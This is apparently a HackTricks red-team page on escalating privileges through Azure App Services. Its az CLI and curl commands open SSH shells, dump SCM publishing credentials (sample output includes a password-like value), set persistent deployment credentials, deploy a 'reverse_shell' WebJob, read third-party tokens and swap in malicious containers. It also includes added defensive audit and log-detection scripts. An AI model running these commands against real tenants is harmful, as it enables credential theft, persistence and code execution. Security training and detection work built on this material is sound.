Az - App Services Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

App Services

For more information about Azure App Services check:

Az - Azure App Services

Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read

These permissions allow getting an SSH shell inside the web app. They also allow debugging the app.

  • SSH in one command:

```bash
# Direct option
az webapp ssh --name <name> --resource-group <res-group>
```

  • Create a tunnel and then connect over SSH:

```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>

## If successful you will get a message such as:
#Verifying if app is running....
#App is running. Trying to establish tunnel connection...
#Opening tunnel on port: 39895
#SSH is available { username: root, password: Docker! }

## So from that machine ssh into that port (you might need to open a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895
```

  • Debug the application:
  1. Install the Azure extension in VS Code.
  2. Log in to the extension with the Azure account.
  3. List all the App Services inside the subscription.
  4. Select the App Service you want to debug, right-click and select "Start Debugging".
  5. If the app doesn't have debugging enabled, the extension will try to enable it, but your account needs the permission Microsoft.Web/sites/config/write to do so.

Obtaining SCM Credentials & Enabling Basic Authentication

To obtain the SCM credentials, you can use the following commands and permissions:

  • The permission Microsoft.Web/sites/publishxml/action allows to call:

```bash
az webapp deployment list-publishing-profiles --name <app-name> --resource-group <res-group>
# Example output
[
  {
    "SQLServerDBConnectionString": "",
    "controlPanelLink": "https://portal.azure.com",
    "databases": null,
    "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
    "hostingProviderForumLink": "",
    "msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
    "mySQLDBConnectionString": "",
    "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
    "publishMethod": "MSDeploy",
    "publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
    "userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
    "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
    "webSystem": "WebSites"
  },
  {
    "SQLServerDBConnectionString": "",
    "controlPanelLink": "https://portal.azure.com",
    "databases": null,
    "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
    "ftpPassiveMode": "True",
    "hostingProviderForumLink": "",
    "mySQLDBConnectionString": "",
    "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
    "publishMethod": "FTP",
    "publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
    "userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
    "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
    "webSystem": "WebSites"
  },
  {
    "SQLServerDBConnectionString": "",
    "controlPanelLink": "https://portal.azure.com",
    "databases": null,
    "destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
    "hostingProviderForumLink": "",
    "mySQLDBConnectionString": "",
    "profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
    "publishMethod": "ZipDeploy",
    "publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
    "userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
    "userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
    "webSystem": "WebSites"
  }
]
```

Note that the username is the same in every profile (except for FTP, which prefixes it with the app name), and the password is identical across all of them.

Also, the SCM URL is <app-name>.scm.azurewebsites.net.

  • The permission Microsoft.Web/sites/config/list/action allows to call:

```bash
az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Example output
{
  "id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
  "kind": null,
  "location": "Canada Central",
  "name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
  "publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
  "publishingPasswordHash": null,
  "publishingPasswordHashSalt": null,
  "publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
  "resourceGroup": "carlos_rg_3170",
  "scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
  "type": "Microsoft.Web/sites/publishingcredentials"
}
```

Note how the credentials are the same as in the previous command.

  • Another option would be to set your own credentials and use them:

```bash
# Show if any user is configured (password won't be shown)
az webapp deployment user show

# Set your own credentials
az webapp deployment user set \
  --user-name hacktricks \
  --password 'W34kP@ssw0rd123!'

# To delete it, check https://stackoverflow.com/questions/45275329/remove-deployment-credentials-from-azure-webapp
```

Then, you can use these credentials to log in to the SCM platform and to FTP. This is also a good way to maintain persistence.

Note that to log in to the SCM platform from the web you need to access <SCM-URL>/BasicAuth.

warning

Note that every user can create their own credentials by calling the previous command, but if the user doesn't have enough permissions to log in to SCM or FTP, the credentials won't work.

  • If you see that those credentials are REDACTED, it's because you need to enable the SCM basic authentication option, and for that you need the second permission (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

```bash
# Enable basic authentication for SCM
az rest --method PUT \
  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
  --body '{
    "properties": {
      "allow": true
    }
  }'

# Enable basic authentication for FTP
az rest --method PUT \
  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
  --body '{
    "properties": {
      "allow": true
    }
  }'
```
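The two facts above that matter most to a defender are that one publishing password is shared by the MSDeploy, FTP and ZipDeploy profiles, and that the basicPublishingCredentialsPolicies/scm and /ftp resources decide whether that password is usable at all. The following script is an added example (not code from the HackTricks page) that audits both from the JSON these calls return: it groups publishing profiles by password, parses the policy resource ids, and builds the `az rest` call that flips `allow` to `false` (the mirror image of the enable call above). The profile and policy JSON are constructed samples with a placeholder secret; the policy shape (`id`, `name`, `properties.allow`) is assumed to match what the PUT above writes.

```python
# Added example (not the HackTricks page's own code): audit App Service publishing
# secrets and basic-auth policies from the defender's side. All JSON below is
# constructed; the policy resource shape (id/name/properties.allow) is assumed.
import json
import re
from collections import defaultdict

API_VERSION = "2022-03-01"  # same API version the page's az rest calls use

# Constructed sample: the three publishing profiles of one app, trimmed to the
# fields used here. The secret is a placeholder, not a real password.
SAMPLE_PROFILES = json.loads(r"""
[
 {"profileName": "demo-app - Web Deploy", "publishMethod": "MSDeploy",
  "publishUrl": "demo-app.scm.azurewebsites.net:443",
  "userName": "$demo-app", "userPWD": "<placeholder-secret>"},
 {"profileName": "demo-app - FTP", "publishMethod": "FTP",
  "publishUrl": "ftps://example-host.ftp.azurewebsites.windows.net/site/wwwroot",
  "userName": "demo-app\\$demo-app", "userPWD": "<placeholder-secret>"},
 {"profileName": "demo-app - Zip Deploy", "publishMethod": "ZipDeploy",
  "publishUrl": "demo-app.scm.azurewebsites.net:443",
  "userName": "$demo-app", "userPWD": "<placeholder-secret>"}
]
""")

# Constructed sample: basicPublishingCredentialsPolicies/{scm,ftp} for two apps,
# in the assumed ARM shape (id, name, type, properties.allow).
_SUB = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo/providers/Microsoft.Web/sites/"
SAMPLE_POLICIES = [
    {"id": _SUB + "demo-app/basicPublishingCredentialsPolicies/scm", "name": "scm",
     "type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "properties": {"allow": True}},
    {"id": _SUB + "demo-app/basicPublishingCredentialsPolicies/ftp", "name": "ftp",
     "type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "properties": {"allow": False}},
    {"id": _SUB + "legacy-app/basicPublishingCredentialsPolicies/scm", "name": "scm",
     "type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "properties": {"allow": True}},
    {"id": _SUB + "legacy-app/basicPublishingCredentialsPolicies/ftp", "name": "ftp",
     "type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "properties": {"allow": True}},
]

POLICY_ID = re.compile(
    r"^/subscriptions/(?P<sub>[^/]+)/resourceGroups/(?P<rg>[^/]+)/providers/"
    r"Microsoft\.Web/sites/(?P<app>[^/]+)/basicPublishingCredentialsPolicies/(?P<kind>scm|ftp)$",
    re.IGNORECASE)


def shared_secret_profiles(profiles):
    """Group publishing profiles by password. One secret shared by several publish
    methods means a single leak grants every one of those deployment paths."""
    by_pwd = defaultdict(list)
    for p in profiles:
        by_pwd[p["userPWD"]].append(p["publishMethod"])
    return {pwd: methods for pwd, methods in by_pwd.items() if len(methods) > 1}


def scm_host(app_name):
    """Kudu/SCM host of an app, following the <app-name>.scm.azurewebsites.net convention."""
    return f"{app_name}.scm.azurewebsites.net"


def audit_policies(policies):
    """Return one finding per scm/ftp policy resource that still allows basic auth."""
    findings = []
    for pol in policies:
        m = POLICY_ID.match(pol["id"])
        if not m:
            continue  # not a basic-auth policy resource; ignore
        if pol.get("properties", {}).get("allow") is True:
            findings.append({**m.groupdict(), "scm_host": scm_host(m["app"])})
    return findings


def remediation(finding):
    """The az rest PUT that disables basic auth for the finding: same URI the page
    uses to enable it, with allow set to false."""
    uri = ("https://management.azure.com/subscriptions/{sub}/resourceGroups/{rg}"
           "/providers/Microsoft.Web/sites/{app}/basicPublishingCredentialsPolicies/{kind}"
           "?api-version=" + API_VERSION).format(**finding)
    body = {"properties": {"allow": False}}
    return {"uri": uri, "body": body,
            "command": f"az rest --method PUT --uri \"{uri}\" --body '{json.dumps(body)}'"}


if __name__ == "__main__":
    for pwd, methods in shared_secret_profiles(SAMPLE_PROFILES).items():
        print(f"one secret shared by {len(methods)} publish methods: {', '.join(methods)}")
    for f in audit_policies(SAMPLE_POLICIES):
        print(f"[basic auth enabled] {f['app']} ({f['kind']}) -> {remediation(f)['command']}")
```

In a real tenant the inputs come from `az webapp deployment list-publishing-profiles` and from an `az rest --method GET` on the same policy URIs; the audit deliberately treats both scm and ftp separately, because the page's enable step is also per-endpoint.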

Publish code using SCM credentials

Having valid SCM credentials it's possible to publish code to the App Service. This can be done using the following command.

For this python example you can download the repo from https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, make any changes you want and then zip it by running: `zip -r app.zip .`

Then you can publish the code to the web app using the following command:

```bash
curl -X POST "<SCM-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"
```

Webjobs: Microsoft.Web/sites/publish/Action | SCM credentials

The indicated Azure permission allows performing several interesting actions that can also be performed using SCM credentials:

  • Read WebJobs logs:

```bash
# Using Azure credentials
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt"  --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt"  --resource "https://management.azure.com/"

# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
  --user '<username>:<password>' -v
```

  • Read WebJobs source code:

```bash
# Using SCM username and password:
# Find all the webjobs inside:
curl "<SCM-URL>/wwwroot/App_Data/jobs/" \
  --user '<username>:<password>'

# e.g.
curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \
  --user '<username>:<password>'
```

  • Create a continuous WebJob:

```bash
# Using Azure permissions
az rest \
  --method put \
  --uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
  --headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
  --body "@/Users/username/Downloads/rev.js" \
  --resource "https://management.azure.com/"

# Using SCM credentials
curl -X PUT \
  "<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
  -H 'Content-Disposition: attachment; filename=rev.js' \
  --data-binary "@/Users/carlospolop/Downloads/rev.js" \
  --user '<username>:<password>'
```

Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

These permissions allow assigning a managed identity to the App Service, so if the App Service was previously compromised, this lets the attacker assign a new managed identity to the App Service and escalate privileges to it.

```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subscription-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```

Microsoft.Web/sites/config/list/action

This permission allows listing the connection strings and app settings of the App Service, which may contain sensitive information such as database credentials.

```bash
az webapp config connection-string list --name <name> --resource-group <res-group>
az webapp config appsettings list --name <name> --resource-group <res-group>
```

Read Configured Third-Party Credentials

Running the following command it's possible to read the third-party credentials configured in the current account. Note that if, for example, the GitHub credentials were configured by a different user, you can't get that token from another one.

```bash
az rest --method GET \
  --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```

This command returns the GitHub, Bitbucket, Dropbox and OneDrive tokens.

Here are example commands to check the tokens:

```bash
# GitHub – List Repositories
curl -H "Authorization: token <token>" \
  -H "Accept: application/vnd.github.v3+json" \
  https://api.github.com/user/repos

# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
  -H "Accept: application/json" \
  https://api.bitbucket.org/2.0/repositories

# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  --data '{"path": ""}'

# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
  -H "Accept: application/json" \
  https://graph.microsoft.com/v1.0/me/drive/root/children
```

Update App Code from the source

  • If the configured source is a third-party provider such as GitHub, Bitbucket or Azure Repository, you could update the App Service code by compromising the source code in the repository.
  • If the app is configured to use a remote git repository (with a username and password), it's possible to get the URL and the basic-auth credentials to clone and push changes with:
    • Using the permission Microsoft.Web/sites/sourcecontrols/read: az webapp deployment source show --name <app-name> --resource-group <res-group>
    • Using the permission Microsoft.Web/sites/config/list/action:
      • az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
      • az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"
  • If the app is configured to use a local git repository, it's possible to clone the repository and push changes to it:
    • Using the permission Microsoft.Web/sites/sourcecontrols/read: you can get the git repository URL with az webapp deployment source show --name <app-name> --resource-group <res-group>, but it will be the app's SCM URL with the path /<app-name>.git (e.g. https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git).
    • To get the SCM credentials you need one of these permissions:
      • Microsoft.Web/sites/publishxml/action: then run az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>.
      • Microsoft.Web/sites/config/list/action: then run az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>

warning

Note that with the permission Microsoft.Web/sites/config/list/action and SCM credentials it's always possible to deploy to the web app (even if it was configured to use a third-party provider), as mentioned in the previous section.

warning

Note that with the permissions below it's also possible to run any container, even if the web app was configured differently.

Microsoft.Web/sites/config/Write, Microsoft.Web/sites/config/Read, Microsoft.Web/sites/config/list/Action, Microsoft.Web/sites/Read

This set of permissions allows changing the container used by the web app. An attacker could use it to make the web app run a malicious container.

```bash
az webapp config container set \
  --name <app-name> \
  --resource-group <res-group> \
  --docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest
```
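Every technique on this page is exercised through a control-plane permission, and each of those permissions shows up as an `operationName` in the Azure Activity Log. The script below is an added example (not code from the HackTricks page) that maps the permissions named above to a severity, turns matching records into alerts, and raises a higher-confidence "chain" when one caller succeeds at two or more distinct high-severity operations against the same site inside a time window (for instance `config/list/action` followed by `basicPublishingCredentialsPolicies/write` and `publishxml/action`). The records are constructed samples; the field names used (`operationName.value`, `caller`, `resourceId`, `eventTimestamp`, `status.value`) follow the Activity Log schema, and the severities are this example's own choice.

```python
# Added example (not the HackTricks page's own code): classify Azure Activity Log
# records by the App Service operations this page lists and correlate them per
# caller and site. All records below are constructed.
from datetime import datetime, timedelta

# Operation -> (severity, what it grants). Keys are lower-cased permission names
# taken from this page; the severities are this example's own assumptions.
SENSITIVE_OPS = {
    "microsoft.web/sites/publishxml/action": ("high", "publishing profiles: SCM/FTP/ZipDeploy credentials"),
    "microsoft.web/sites/config/list/action": ("high", "publishing credentials, connection strings, app settings"),
    "microsoft.web/sites/basicpublishingcredentialspolicies/write": ("high", "enable basic auth for SCM/FTP"),
    "microsoft.web/sites/config/write": ("high", "change container image or enable debugging"),
    "microsoft.web/sites/write": ("medium", "site update, including managed identity assignment"),
    "microsoft.web/sites/publish/action": ("medium", "SSH, remote debugging and WebJobs through Kudu"),
    "microsoft.web/sites/sourcecontrols/read": ("low", "deployment source and repository URL"),
}

SITE = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo"
        "/providers/Microsoft.Web/sites/demo-app")  # constructed resource id


def _rec(caller, ts, op, status="Succeeded"):
    """Build a constructed Activity Log record with only the fields used here."""
    return {"caller": caller, "eventTimestamp": ts, "operationName": {"value": op},
            "status": {"value": status}, "resourceId": SITE}


# Constructed sample: one benign read, one three-step credential grab by a single
# caller, one isolated container change by a pipeline, and one failed attempt.
SAMPLE_RECORDS = [
    _rec("dev@example.com", "2024-05-01T10:00:00Z", "Microsoft.Web/sites/Read"),
    _rec("suspect@example.com", "2024-05-01T10:05:00Z", "Microsoft.Web/sites/config/list/action"),
    _rec("suspect@example.com", "2024-05-01T10:12:00Z", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/write"),
    _rec("suspect@example.com", "2024-05-01T10:15:00Z", "Microsoft.Web/sites/publishxml/action"),
    _rec("ci-pipeline@example.com", "2024-05-01T09:00:00Z", "Microsoft.Web/sites/config/write"),
    _rec("dev@example.com", "2024-05-01T10:30:00Z", "Microsoft.Web/sites/publishxml/action", status="Failed"),
]


def classify(record):
    """(severity, description) if the record is one of the sensitive operations, else None."""
    return SENSITIVE_OPS.get(record["operationName"]["value"].lower())


def _ts(record):
    return datetime.strptime(record["eventTimestamp"], "%Y-%m-%dT%H:%M:%SZ")


def detect(records, window_minutes=30):
    """Return per-record alerts plus 'chains': a caller succeeding at two or more
    distinct high-severity operations against the same site within the window."""
    alerts, succeeded_high = [], {}
    for rec in records:
        hit = classify(rec)
        if hit is None:
            continue
        severity, grants = hit
        alert = {"caller": rec["caller"], "time": _ts(rec), "site": rec["resourceId"],
                 "operation": rec["operationName"]["value"], "severity": severity,
                 "grants": grants, "status": rec["status"]["value"]}
        alerts.append(alert)
        if severity == "high" and alert["status"] == "Succeeded":
            succeeded_high.setdefault((alert["caller"], alert["site"]), []).append(alert)
    window = timedelta(minutes=window_minutes)
    chains = []
    for (caller, site), hits in succeeded_high.items():
        hits.sort(key=lambda a: a["time"])
        for i, first in enumerate(hits):
            ops = {h["operation"] for h in hits[i:] if h["time"] - first["time"] <= window}
            if len(ops) >= 2:
                chains.append({"caller": caller, "site": site, "start": first["time"].isoformat(),
                               "operations": sorted(ops)})
                break  # one chain per caller/site pair is enough to raise the alarm
    return {"alerts": alerts, "chains": chains}


if __name__ == "__main__":
    result = detect(SAMPLE_RECORDS)
    for a in result["alerts"]:
        print(f"[{a['severity']}] {a['time']:%H:%M} {a['caller']} {a['operation']} ({a['status']}) -> {a['grants']}")
    for c in result["chains"]:
        print(f"CHAIN {c['caller']} on {c['site'].rsplit('/', 1)[-1]} from {c['start']}: {', '.join(c['operations'])}")
```

Failed attempts are still reported as alerts (a denied `publishxml/action` is a useful signal in itself) but do not count toward a chain, and the pipeline identity's single `config/write` is left for allow-listing rather than escalated, which keeps the chain alert focused on the credential-then-deploy sequence this page describes.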
